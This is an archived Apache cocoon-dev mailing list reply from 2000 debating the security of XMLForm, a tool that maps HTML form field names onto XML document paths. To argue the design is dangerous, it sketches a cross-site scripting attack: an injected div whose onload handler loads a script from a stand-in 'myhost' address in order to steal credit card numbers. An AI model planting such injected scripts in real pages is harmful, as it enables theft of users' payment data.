cocoon-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Stefano Mazzocchi <stef...@apache.org>
Subject Re: [announce] XMLForm - a new project using Xerces, Xalan, & JTidy
Date Fri, 03 Mar 2000 23:44:02 GMT
Sorry, forgot about this thread.

Donald Ball wrote:
> 
> > Also, I don't like the ability for users to match around with my XML
> > structure from the HTML form, this is a HUGE security hole.
> 
> (match around == mess around ?)

yes, sorry.

> How else do you suppose content editors
> are going to be able to edit site content over the web?? 

Anybody heard of WebDAV?
 
> If you're worried
> about users being able to fake forms, well, there's a reason it's a POST
> only servlet. I'm already going to add origination URL restrictions.
> 
> > I think Donald's proposal is clever, but adds more problems than it
> > solves. We must think about better ways to do the full loop
> 
> Can you elaborate? Right now, the only thing I don't like about XMLForm is
> having to write the XML fragment mockup in the HTML form using specially
> named parameters. However, Eric van der Vlist has suggested an interesting
> alternate strategy that I may well adopt. That being said, I'm now happily
> adding, editing, and removing fragments from my XML files through a nice
> HTML form interface using XMLForm and cocoon. I'd rather like to know what
> problems you see with this approach.

Like I said, it's clever to encode the logical structure of the data in
their variable names.... still this is a very dangerous approach. You're
asking for trouble.

Not only you are allowing people to change your web content by forms
(have you read the latest security reccomandation about cross-scripting?
well, download Apache 1.3.12 to find out.) but you give them the power
to place this content where they want in your tree.

So, let's say, if Amazon allowed this in their page...something like

 text -> /document/comments/comment/text

and instead I hack up the HTML page and do

 text -> /document/header/title

I put "<div onload="invoque('http://myhost/myscript.js')"></div>"

and overwrite the "sendCreditCardNumber()" method from their page
cloning it to my own site.

Without even having to hack their site.

Do you deal with something like that?

> It's not a proposal, anyway, it's a project. Proposal is when you say you
> want to do something, project is when you have done something. :)

Sorry, you're right.

I think we need something like this


 <form>
  <parameter name="whatever" defaultvalue="..." type="..."/>
  ...
 </form>
 
 <xsp:handle

that should generate the producer able to handle both GET (and create
the form) and POST (and process the form doing security tests).

This is what I mean by loop.

 request -(get)-> form to fill -(post)-> response

all compiled into one XSP that takes care of everything (hopefully
backed up with some OODBMS of some sort... either XML based or EJB
based).

But this is still very fuzzy.

-- 
Stefano Mazzocchi      One must still have chaos in oneself to be
                          able to give birth to a dancing star.
<stefano@apache.org>                             Friedrich Nietzsche
--------------------------------------------------------------------
 Come to the first official Apache Software Foundation Conference!  
------------------------- http://ApacheCon.Com ---------------------



Mime
View raw message